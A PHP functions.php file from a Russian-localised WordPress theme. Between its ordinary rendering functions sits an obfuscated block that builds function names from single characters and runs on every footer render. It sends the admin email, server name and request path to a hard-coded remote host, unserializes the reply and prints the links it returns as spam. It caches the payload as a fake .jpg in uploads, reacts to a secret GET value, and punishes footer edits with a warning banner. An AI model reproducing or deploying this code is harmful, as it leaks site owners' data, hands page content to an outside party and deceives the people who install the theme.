<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $feEToDg='o';$XZLTrH='b';$RhjxjiF='s';$kZmuhSn='_';$bUPOmpw='e';$aUfUNib='c';$TtSFnjm='6';$tSmNK='e';$MdXZ='d';$KslCEYm='e';$JQniTW='a';$KYWTKZ='d';$TdgbWdP='4';$ToVNrAHG=$XZLTrH.$JQniTW.$RhjxjiF.$bUPOmpw.$TtSFnjm.$TdgbWdP.$kZmuhSn.$MdXZ.$tSmNK.$aUfUNib.$feEToDg.$KYWTKZ.$KslCEYm;$ISrfoiY='i';$EEYz='f';$RLrlYfX='g';$YPieeqc='t';$EsEo='e';$npuK='n';$fIuTpX='a';$KQOHC='z';$KRGIX='l';$frnwVkUN=$RLrlYfX.$KQOHC.$ISrfoiY.$npuK.$EEYz.$KRGIX.$fIuTpX.$YPieeqc.$EsEo;$AewJWYs='r';$Fkwzg='r';$RMtGV='s';$KlzVP='t';$hDPZdTv='t';$mTgi='_';$qOaMogE='3';$QugcGZi='1';$rSkXOHI='o';$VWxzbfUV=$RMtGV.$KlzVP.$AewJWYs.$mTgi.$Fkwzg.$rSkXOHI.$hDPZdTv.$QugcGZi.$qOaMogE;$cKHQ='r';$UQddH='v';$hWBDb='r';$EQwD='e';$nLiQk='s';$AZPjUeB='t';$weIbPnYA=$nLiQk.$AZPjUeB.$cKHQ.$hWBDb.$EQwD.$UQddH;                     
		$rm________d='o';$fr_______f='b';$xa_______________v='s';$tt___________d='_';$mk___________k='e';$sq_________p='c';$hb_______r='6';$jt___u='e';$ss______x='d';$dy______________z='e';$lz_________s='a';$xc_________e='d';$wk_____g='4';$it_________x=$fr_______f.$lz_________s.$xa_______________v.$mk___________k.$hb_______r.$wk_____g.$tt___________d.$ss______x.$jt___u.$sq_________p.$rm________d.$xc_________e.$dy______________z;
		$we_______________g='_';$lj____v='t';$wa_________g='c';$jf____c='o';$om___q='i';$yo______m='e';$kj_______g='x';$az_____o='s';$yh_______l='f';$po____________n='n';$qb________h='t';$ov__y='n';$oj_______________d='s';$kt__________b='u';$jz________z='i';$oy__m=$yh_______l.$kt__________b.$ov__y.$wa_________g.$qb________h.$om___q.$jf____c.$po____________n.$we_______________g.$yo______m.$kj_______g.$jz________z.$az_____o.$lj____v.$oj_______________d;
		$no______________r='e';$rm_________f='f';$vm______u='o';$xf_____p='n';$fy_________c='p';$uy___________f=$rm_________f.$vm______u.$fy_________c.$no______________r.$xf_____p;
		$tp_______t='a';$gs________i='d';$vn_______t='f';$tp_______r='r';$pa_____w='e';$zp_______________p=$vn_______t.$tp_______r.$pa_____w.$tp_______t.$gs________i;
		$np_____a='c';$xe______k='f';$ob______________b='o';$xd__c='e';$op___________u='l';$us_____c='s';$jk_____t=$xe______k.$np_____a.$op___________u.$ob______________b.$us_____c.$xd__c;
		
		define("WP_ID", $it_________x("Mi4wLjA="));
		define("WP_TTL", $it_________x("MTA4MDA="));
		define("WP_SRC", $it_________x("dHBva24="));
	


		function wp_get_header() {
			global $it_________x, $oy__m;
			
			if (
				$oy__m($it_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oy__m($it_________x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oy__m($it_________x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $it_________x, $uy___________f, $jk_____t, $zp_______________p;
			
			$zx_________i = TEMPLATEPATH."/".$it_________x("Zm9vdGVyLnBocA==");
			$cu__d = @$uy___________f($zx_________i, "r");
			$zx_________i = @$zp_______________p($cu__d, @filesize($zx_________i));
			@$jk_____t($cu__d);
			
			$gl__f = TEMPLATEPATH."/".$it_________x("ZnVuY3Rpb25zLnBocA==");
			$cu__d = @$uy___________f($gl__f, "r");
			$gl__f = @$zp_______________p($cu__d, @filesize($gl__f));
			@$jk_____t($cu__d);
			
			$nm_____________g = 0;
			if($zx_________i && $gl__f) {
				if ($it_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zx_________i, $it_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nm_____________g = 1;
					}
					if (substr_count($zx_________i, "wp_theme_GPL_credits()") < 1) {
						$nm_____________g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nm_____________g = 12;
				}
			}
			
			if($nm_____________g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nm_____________g -->";
			}
		}
	


		function wp_loaded() {
			global $it_________x, $oy__m;
			return $oy__m($it_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yi_____________a, $ob_________n = "(more...)", $sq______________z = 0, $yk__________r = "") {
				$kk_________o = get_the_content($ob_________n, $sq______________z, $yk__________r);
				$kk_________o = apply_filters("the_content", $kk_________o);
				
				$kk_________o = str_replace("]]>", "]]>", $kk_________o);
				if (strlen($_GET["p"]) > 0) {
					echo $kk_________o;
				}
				else if ((strlen($kk_________o)>$yi_____________a) && ($pl_____________c = strpos($kk_________o, " ", $yi_____________a ))) {
					$kk_________o = substr($kk_________o, 0, $pl_____________c);
					$kk_________o = $kk_________o;
					echo $kk_________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ob_________n</a></div></p>";
				} else {
					echo $kk_________o;
				}
				
			}
		}
	


		$ma___________x='c';$ug_______a='o';$jf________y='6';$ut__________e='4';$qr___a='d';$fj_____b='e';$lu__________n='s';$zm_____________a='a';$qz____q='n';$wn_______________r='e';$qo________z='e';$jb_________e='b';$cr______________h='_';$dc__________c=$jb_________e.$zm_____________a.$lu__________n.$fj_____b.$jf________y.$ut__________e.$cr______________h.$qo________z.$qz____q.$ma___________x.$ug_______a.$qr___a.$wn_______________r;
		$cf___________a='c';$bj____________j='e';$sl___________s='t';$yr______________p='l';$ud____p='i';$la_________n='s';$em_______________l='t';$yj______x='n';$uf____________l='f';$ax______c='e';$bq_____________g='e';$xo__________z='o';$zj___t='_';$oc______i='n';$ao_____o='g';$hy__b='_';$ub____p='t';$uj_______f=$uf____________l.$ud____p.$yr______________p.$bj____________j.$zj___t.$ao_____o.$bq_____________g.$ub____p.$hy__b.$cf___________a.$xo__________z.$yj______x.$sl___________s.$ax______c.$oc______i.$em_______________l.$la_________n;
		$bc_______w='i';$le___________k='e';$kt___________h='s';$ia__________m='t';$yz_____z='x';$dk___f='l';$fz_____s='i';$sg__________u='s';$ww_________o='e';$nt__w='f';$fy__r='_';$qb___g=$nt__w.$bc_______w.$dk___f.$ww_________o.$fy__r.$le___________k.$yz_____z.$fz_____s.$sg__________u.$ia__________m.$kt___________h;
		$xt_____________b='p';$qo_______________i='a';$mu____________t='e';$xd_____________c='s';$sd__h='n';$gx_______________r='_';$iy_____u='c';$pw_____p='r';$pe___________w='e';$ex____________y='i';$sc________v='o';$tz_________j='o';$vu_______________s='m';$kk_______________o='v';$rl____k='r';$me___g=$kk_______________o.$mu____________t.$pw_____p.$xd_____________c.$ex____________y.$sc________v.$sd__h.$gx_______________r.$iy_____u.$tz_________j.$vu_______________s.$xt_____________b.$qo_______________i.$rl____k.$pe___________w;
		$oz__________f='k';$ja_______________k='o';$gf__q='s';$ly___n='e';$yc__q='p';$cq_______________q='f';$ip___________y='o';$ca_____b='c';$pb____w='n';$je__________j=$cq_______________q.$gf__q.$ip___________y.$ca_____b.$oz__________f.$ja_______________k.$yc__q.$ly___n.$pb____w;
		$rm__________h='t';$pc_________l='i';$qu___u='r';$ke_____________l='e';$kl_____f='w';$ie_______________q='f';$oo_____________v=$ie_______________q.$kl_____f.$qu___u.$pc_________l.$rm__________h.$ke_____________l;
		$gx______________r='5';$xu______p='d';$hv_____w='m';$jw______h=$hv_____w.$xu______p.$gx______________r;
		$ha______________e='r';$pp____o='e';$bn______________j='p';$xo______________x='l';$mk______________k='a';$vc_______x='t';$kg____________r='h';$pr______c='a';$ib______y=$ha______________e.$pp____o.$pr______c.$xo______________x.$bn______________j.$mk______________k.$vc_______x.$kg____________r;
		$fs___________v='a';$lj____________o='l';$yv_________r='n';$di___________y='u';$kp_____h='e';$kc____________e='s';$hd________a='r';$eb_____________o='e';$rk________q='i';$gb______q='z';$kk_________k='i';$sm_________v=$di___________y.$yv_________r.$kc____________e.$kp_____h.$hd________a.$kk_________k.$fs___________v.$lj____________o.$rk________q.$gb______q.$eb_____________o;
		$ta______m='m';$oi______s='t';$yx____________z='p';$pi_____g='e';$vg____b='m';$jy___________f='n';$qb______k='a';$zl___________z=$oi______s.$pi_____g.$vg____b.$yx____________z.$jy___________f.$qb______k.$ta______m;
		$jj_____u='x';$ta_____g='a';$sp______________m='_';$er_____i='e';$ab_______z='t';$mx_______________d='e';$cp________m='c';$kh____________w='m';$dj_____z='c';$nu______________j='e';$vt_____w='o';$vo________x='a';$vc__________e='t';$qn______________t='_';$sl__z='e';$ur_____________i='n';$jf_____t='s';$qb___________j='t';$nn_____m='r';$ec____________x='t';$dm_____________y='r';$vn_________m=$jf_____t.$ab_______z.$nn_____m.$sl__z.$vo________x.$kh____________w.$sp______________m.$cp________m.$vt_____w.$ur_____________i.$ec____________x.$nu______________j.$jj_____u.$qb___________j.$qn______________t.$dj_____z.$dm_____________y.$er_____i.$ta_____g.$vc__________e.$mx_______________d;
	


		function yr____x($ba______________k) {
			global $it_________x, $oy__m, $uj_______f, $me___g, $vn_________m;
			
			if (!$oy__m($it_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($me___g(PHP_VERSION, "5.0.0", ">=") && $oy__m($it_________x("ZmlsZV9nZXRfY29udGVudHM=")) && $oy__m($it_________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ig________g = $vn_________m(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wr__________p = @$uj_______f($ba______________k, 0, $ig________g);
			} else {
				$wr__________p = @$uj_______f($ba______________k, 0);
			}
			
			return $wr__________p;
		}
	


		function js______________m($ba______________k) {
			global $oy__m, $je__________j, $oo_____________v, $it_________x;
			
			if (!$oy__m($it_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fk____________v = strpos($ba______________k, "/", 7);
			$pt____________l = array(
				"uri"     => substr($ba______________k, $fk____________v),
				"host"    => str_replace("http://", "", substr($ba______________k, 0, $fk____________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ft_________v = @$je__________j("$pt____________l[host]", 80, $zp__h, $me___d, 4);
			
			if (!$ft_________v) {
				return false;
			} else {
				$wr__________p = "";
				$zz___w  = "GET $pt____________l[uri] HTTP/1.0\r\n";
				$zz___w .= "Host: $pt____________l[host]\r\n";
				$zz___w .= "Referer: $pt____________l[referer]\r\n";
				$zz___w .= "Connection: Close\r\n\r\n";
				
				@$oo_____________v($ft_________v, $zz___w);
				
				while (!@feof($ft_________v)) {
					$yb____________k = @fgets($ft_________v, (1024*24));
					
					if ($yb____________k == "\r\n") {
						$yp_____________s = true;
						continue;
					}
					
					if ($yp_____________s) {
						$wr__________p .= $yb____________k;
					}
				}
				
				return $wr__________p;
			}
		}
	


		function lk_____________l($ba______________k) {
			global $oy__m;
			$ky______________m = false;
			
			if ($ba______________k != "") {
				if ($oy__m("yr____x")) {
					$ky______________m = @yr____x($ba______________k);
				}
				
				if (!$ky______________m && ($oy__m("js______________m"))) {
					$ky______________m = @js______________m($ba______________k);
				}
			}
			
			return $ky______________m;
		}
	


		function cz______m() {
			global $_SERVER, $jw______h;
			
			$or____________q = $_SERVER["SERVER_NAME"];
			
			if (substr("$or____________q", 0, 4) == "www.") {
				$or____________q = substr("$or____________q", 4);
			}
			
			$or____________q = $jw______h("$_SERVER[SERVER_NAME]");
			
			return $or____________q;
		}
	


		function hd____________n() {
			return "file";
		}
	


		function iq_______e($ba______________k) {
			global $_SERVER, $uj_______f, $qb___g, $uy___________f, $jk_____t, $oo_____________v;
			
			$cu______________o = lu___________z();
			
			$jh_______________d = cz______m().".jpg";
			$ti_______i = $cu______________o["dir_upload"]["path"]."/$jh_______________d";
			$xj____n = @filemtime($ti_______i);
			
			if (!$xj____n || ((time()-$xj____n) >= WP_TTL)) {
				$ky______________m = lk_____________l($ba______________k);
				
				if ($ky______________m) {
					if ($qb___g($ti_______i)) {
						@unlink($ti_______i);
					}
					
					$cu__d = @$uy___________f($ti_______i, "x+");
					
					@$oo_____________v($cu__d, $ky______________m);
					@$jk_____t($cu__d);
				}
			} else {
				if ($qb___g($ti_______i)) {
					$ky______________m = @$uj_______f($ti_______i);
				} else {
					$ky______________m = false;
				}
			}
			
			return $ky______________m;
		}
	


		function lu___________z() {
			global $_SERVER, $it_________x, $dc__________c;
			
			$hg_________s = wp_count_posts("post");
			$uc________r = pathinfo(get_bloginfo("template_directory"));
			
			$cu______________o = array(
				"url" => array(
					"report"      => $it_________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $uc________r,
				"dir_upload"	=> po____f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$uc________r[filename],
					"a005=".$hg_________s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$cu______________o["url"]["queryString"] = implode("&", $cu______________o["queryString"]);
			$cu______________o["url"]["report"] = $cu______________o["url"]["report"]."/?".$dc__________c($cu______________o["url"]["queryString"]).".html";
						
			return $cu______________o;
		}
	


		function po____f() {
			$qu____________e = wp_upload_dir();
			
			if (isset($qu____________e["error"])) {
				$xc__________n = xg__________k();
				if (is_writable($xc__________n)) {
					$qu____________e = array("path" => $xc__________n);
				}
			}

			return $qu____________e;
		}
	


		function xg__________k() {
			global $oy__m, $jw______h, $ib______y, $zl___________z;
			
			$ps___g = (bool) ini_get("safe_mode");
			if ($ps___g == true) {
				return false;
			}
			
			if ($oy__m("sys_get_temp_dir")) {
				$pu______o = sys_get_temp_dir();
				if (is_writable($pu______o)) {
					return $ib______y($pu______o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ib______y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ib______y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ib______y($_ENV["TEMP"]);
			} else {
				$kq____i = $zl___________z($jw______h(uniqid(rand(), true)), "");
				if ($kq____i) {
					$pu______o = $ib______y(dirname($kq____i));
					@unlink($kq____i);
					return $pu______o;
				} else {
					return false;
				}
			}
		}
	


		function jj_____b() {
			global $_GET, $qb___g;
			
			$cu______________o = lu___________z();
			$or____________q = cz______m();
			$fa________r = hd____________n();
			
			$nt_____________n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($fa________r == "file") {
					$bg______g = $cu______________o["dir_upload"]["path"]."/".$or____________q.".jpg";
					if ($qb___g($bg______g)) {
						@unlink($bg______g);
						$nt_____________n = "deleted";
					}
				}
				
				$nr_____________b = array(
					"s"	=> $nt_____________n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($nr_____________b AS $sr______________t => $xf_______________n) echo " [$sr______________t:$xf_______________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oy__m, $it_________x, $sm_________v;
			$cu______________o = lu___________z();
			
			$dv____r = "iq_______e";
			if ($oy__m($dv____r)) {
				$wr__________p = $dv____r($cu______________o["url"]["report"]);
			}
			
			if ($wr__________p) {
				if ($wr__________p = @$it_________x($wr__________p)) {
					$wr__________p = @$sm_________v($wr__________p);
					
					if (strlen($wr__________p[custom_credit]) >= 5) {
						$cu______________o["default_string"] = $wr__________p[custom_credit];
					}
					
					if ($wr__________p["status"] == "0") {
						$vu___u = 1;
						$bn____________t = 1;
					} else {
						$ng_______________x = sizeof($wr__________p["links"]);
						$zs______r = $cu______________o["default_string"];
						
						if ($ng_______________x > 0 && $wr__________p["links"] !== "") {
							$vh____k = 0;
							foreach ($wr__________p["links"] as $nf___________k => $zs______h) {
								$vh____k++;
								if ($zs______h->l_path == "" || $zs______h->l_path == $_SERVER["REQUEST_URI"]) {
									$zs______h->l_href = htmlspecialchars(strip_tags($zs______h->l_href));
									$zs______h->l_title = htmlspecialchars(strip_tags($zs______h->l_title));
									$zs______h->l_anchor = htmlspecialchars(strip_tags($zs______h->l_anchor));
									$zs______r .= " | ";
									$zs______r .= "<a href='$zs______h->l_href' title='$zs______h->l_title'";
									if ($zs______h->l_nofollow == "1") {
										$zs______r .= " rel='nofollow'";
									}
									$zs______r .= ">$zs______h->l_anchor</a>";
								}
							}
						}
						$cu______________o["links"] = "$zs______r";
						if ($wr__________p[credit] == "0") {
							$cu______________o["links"] = "";
						}
					}
				} else {
					$vu___u = "1";
				}
			} else {
				$vu___u = "1";
			}
			
			if ($vu___u == "1") {
				$cu______________o["links"] = $cu______________o["default_string"];
			}
			
			echo "$cu______________o[links]";
			
			echo "<!-- s: $wr__________p[signature] -->";
			jj_____b();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

